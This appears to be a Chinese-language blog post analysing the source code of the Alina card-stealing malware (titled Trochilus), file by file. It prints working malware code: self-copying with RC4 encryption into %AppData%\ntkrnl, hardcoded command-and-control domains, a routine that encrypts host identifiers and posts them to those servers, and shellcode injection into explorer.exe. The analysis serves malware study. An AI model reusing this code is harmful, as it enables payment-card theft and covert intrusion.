Malware Analysis -- Trochilus

Analysis of Trochilus.

Malware Analysis – Alina

项目结构

在Visual Studio中打开：

Base.cpp
main.cpp
MonitoringThread.cpp
PanelRequest.cpp
ProcScanner.cpp
RootkitInstaller.cpp
Scanner.cpp
Settings.cpp
Updater.cpp
Watcher.cpp

编译

VS2019直接编译

分析

main.cpp

Base.cpp（finished）

定义了一个Base类。

主要看Base::Base函数

Base::Base(void)
{
	DWORD ser;
	char pcn[512],
		proc[MAX_PATH + 1],
		appdata[MAX_PATH + 1],
		s[32] = "";

	// 检索与指定根目录关联的文件系统和卷的相关信息。
	// ser: lpVolumeSerialNumber
	// 当前目录的根目录
	GetVolumeInformationA(NULL, NULL, 0, &ser, NULL, NULL, NULL, 0);
	sprintf(s, "%x", ser);
	
	// 检索与本地计算机关联的 NetBIOS 或 DNS 名称。 当系统从注册表读取名称时，会在系统启动时建立这些名称。
	DWORD sz = sizeof(pcn);
	if (!GetComputerName(pcn, &sz))
		strcpy(pcn, "errorretrieving");

	// 检索当前进程的可执行文件的路径。
	if (!GetModuleFileNameA(NULL, proc, sizeof(proc)))
		strcpy(proc, "err");

	// 获取由 CSIDL 值标识的文件夹的路径。
	// 这里应该是找到AppData文件夹的路径
	SHGetFolderPath(NULL, CSIDL_APPDATA, NULL, 0, appdata);

	version = (BYTE)1 << 8 | (BYTE)2;

	// 变换端序
	unsigned char sel = HIBYTE(HIWORD(ser)) + LOBYTE(HIWORD(ser)) + HIBYTE(LOWORD(ser)) + LOBYTE(LOWORD(ser));
	exename = names[sel % N_NAMES];
	// 进程安装路径
	inspath = appdata + std::string("\\") + DIRECTORY_NAME + std::string("\\") + exename;
	insdir = appdata + std::string("\\") + DIRECTORY_NAME + std::string("\\");
	
	// 强制创建指定文件夹，用于安装程序
	ForceDirectories(insdir.c_str());
	
	// 通过读取注册表，获取本机硬件ID
	ReadHardwareId(s, sizeof(s));
	
	// 获取应用程序数据文件夹(AppData)的路径，并存储在SourceFilePath指向的字符串中
	// 然后再给他填上个"ntkrnl"的文件名，作为伪装
	char SourceFilePath[1024];
	SHGetSpecialFolderPath(0, SourceFilePath, CSIDL_APPDATA, 0);
	strcat(SourceFilePath, "\\ntkrnl");

	// 找到自身进程在磁盘上的路径，并读取
	// 获取文件大小
	// malloc分配同样大小的空间
	// 写入，并进行RC4加密；密码就是“Password”
	FILE *Source = fopen(proc, "rb");
	fseek(Source, 0, SEEK_END);
	int Len = ftell(Source);
	fseek(Source, 0, SEEK_SET);
	unsigned char *Data = (unsigned char *) malloc(Len);
	fread(Data, sizeof(char), Len, Source);
	fclose(Source);
	RC4Crypt((unsigned char *) Data, Len, KEY, strlen(KEY));
	
	// 写入 %AppData%/ntkrnl 文件中
	FILE *Destination = fopen(SourceFilePath, "wb");	
	fwrite(Data, sizeof(char), Len, Destination);
	fclose(Destination);

	this->serial = ser;
	this->hwid = s;
	this->pcname = pcn;
	this->curpath = proc;
	this->adpath = appdata;
}

总体干的事情：

• 将自身用RC4加密，密码是“Password”
• 然后写入%AppData%\ntkrnl文件

Watcher.cpp

和名字一样，是个监视器

Settings.cpp（finished）

进行了一些基础设置。

cnc.push_back(std::pair<std::string, std::string>("adobeflasherup1.com", "/wordpress/post.php"));
cnc.push_back(std::pair<std::string, std::string>("javaoracle2.ru", "/wordpress/post.php"));

successcode = 666;
updateinterval = 240;
cardinterval = 120;

CNC: Command aNd Control servers

可能就是黑客用来操控的服务器

Scanner.cpp

Scanner::Scanner()
{
	crc32gentab();
	InitializeCriticalSection(&cp);
	InitializeCriticalSection(&cc);
	DWORD tid;
	CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)monitorThread, this, 0, &tid);
}

首先是crc32gentab

void Scanner::crc32gentab()
{
	unsigned long crc, poly;
	int i, j;

	poly = 0xEDB88320L;
	for (i = 0; i < 256; i++)
	{
		crc = i;
		for (j = 8; j > 0; j--)
		{
			if (crc & 1)
			{
				crc = (crc >> 1) ^ poly;
			}
			else
			{
				crc >>= 1;
			}
		}
		crc_tab[i] = crc;
	}
}

似乎是先进行CRC32打表。

然后创建一个monitorThread线程。

ProcScanner.cpp（finished）

创建procThread线程。

获取进程内存，获取内存拷贝，并调用scan函数。

scan函数似乎是在做指定的恶俗事情，找内存特征。具体细节不是很重要

PanelRequest.cpp（finished）

重点在execute函数。

主要干的事情就是与Settings中设置的CNC服务器进行交互，传输数据。

bool PanelRequest::execute(std::string *response)
{
	std::string version, hwid, pcname, path;
	char *resp, *data;
	unsigned char outkey[18];
	unsigned int rlen, datalen = 0;

	// Retrieve various information
	Base *b = Base::instance();
	b->getSVersion(version);
	b->getCurrentPath(path);
	b->getHWID(hwid);
	b->getPCName(pcname);

	// Calculate the total data length
	std::vector<std::pair<std::string, std::string>>::const_iterator it;
	EnterCriticalSection(&cs);

	for (it = params.begin(); it != params.end(); it++)
		datalen += it->first.length() + 2 + it->second.length() * 3;

	// Prepare Authhdr structure
	Authhdr *hdr = (Authhdr *)new char[sizeof(Authhdr) + datalen];
	hdr->version = b->getNVersion();
	strncpy(hdr->sversion, version.c_str(), sizeof(hdr->sversion));
	strncpy(hdr->hwid, hwid.c_str(), sizeof(hdr->hwid));
	hdr->nonce[0] = rand();
	hdr->nonce[1] = rand();
	strncpy(hdr->pcname, pcname.c_str(), sizeof(hdr->pcname));
	strncpy(hdr->action, action.c_str(), sizeof(hdr->action));
	hdr->size = datalen + 123;

	*(unsigned int *)hdr->sig = 0xab12de34;
	unsigned char *p;
	for (p = (unsigned char *)hdr; p < hdr->sig; p++)
		hdr->sig[*p % 4] += *p + (*p % 27);

	p = hdr->data;
	for (it = params.begin(); it != params.end(); it++) {
		strcpy((char *)p, it->first.c_str());
		p += it->first.length();
		*p++ = '=';
		p = (unsigned char *)urlencode((unsigned char *)it->second.c_str(), it->second.length(), (char *)p);
		*p++ = '&';
	}
	LeaveCriticalSection(&cs);


	// Perform XOR Encryption on Authhdr structure
	memcpy(outkey, hdr->hwid, 18);
	unsigned char k = 0xaa;
	xorEncrypt(hdr, sizeof(Authhdr) + datalen, &k, 1);
	xorEncrypt(hdr->data, datalen, (unsigned char *)hdr->hwid, 18);

	data = (char *)hdr;
	datalen += sizeof(Authhdr);

	Settings *s = Settings::instance();
	s->lock();

	// 遍历CNC服务器
	for (it = s->cnc.begin(); it != s->cnc.end(); it++) {
		char **pr = NULL;
		unsigned int *prlen = NULL;

		if (response) {
			pr = &resp;
			prlen = &rlen;
		}

		//if (httpRequest(it->first.c_str(), it->second.c_str(), 80, "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0", data, datalen, pr, prlen) == s->successcode) 
		// 发送HTTP Request，传递相关数据
		if (httpRequest(it->first.c_str(), it->second.c_str(), 80, version.c_str(), data, datalen, pr, prlen) == s->successcode) 
		{
			// 如果获得了回复，那么就XOR解密，得到回复数据
			if (response && resp && rlen) 
			{
				xorEncrypt(resp, rlen, outkey, 18);
				response->assign(resp, rlen);
				delete[] resp;
			}
			s->unlock();
			return(true);
		}

		if (response && resp && rlen)
			delete[] resp;

		Sleep(1000);
	}
	delete[] hdr;

	s->unlock();
	return(false);
}

RootkitInstaller.cpp（finished）

如果是以admin模式启动程序的，那么就会安装恶意服务（也就是RootKit）

安装的恶意服务已经编译成字节流了。随便逆向了一下

总体干的事情就是绕过windows defender服务。

MonitoringThread

在main中直接调用了InitiateMonitoringThread函数

干的事情就是向explorer.exe注入恶意代码mthread。

void InitiateMonitoringThread()
{
	CreateMutex(NULL, 0, "7YhngylKo09H");	
	if (!(ShellcodeInjected()))
	{
		DWORD ProcessId = GetProcessIdFromName("explorer.exe");
		HANDLE hProcess = OpenProcess(PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_VM_WRITE, false, ProcessId);
		if (hProcess != 0) 
		{
			InjectShellcode(hProcess, mthread, sizeof(mthread));
		}
	}
}

InjectShellcode的具体实现原理就是远程注入线程，利用VirtualAllocEx，WriteProcessMemory，CreateRemoteThread什么的。

mthread分析（未完成）

sub_29E函数是个RC4加密函数。

看上去和Base.cpp中的RC4Crypt是比较相似的。

int __stdcall RC4Encrypt(_BYTE *Buffer, int BufferLen, _BYTE *Key)

sub_232是个strlen。

Updater.cpp（finished）

反正就是利用PanelRequest将卡的数据信息上传至Hacker。

• 本文作者： Taardis
• 本文链接： https://taardisaa.github.io/2023/05/21/Malware-Analysis-Trochilus/
• 版权声明： 本博客所有文章除特别声明外，均采用 Apache License 2.0 许可协议。转载请注明出处！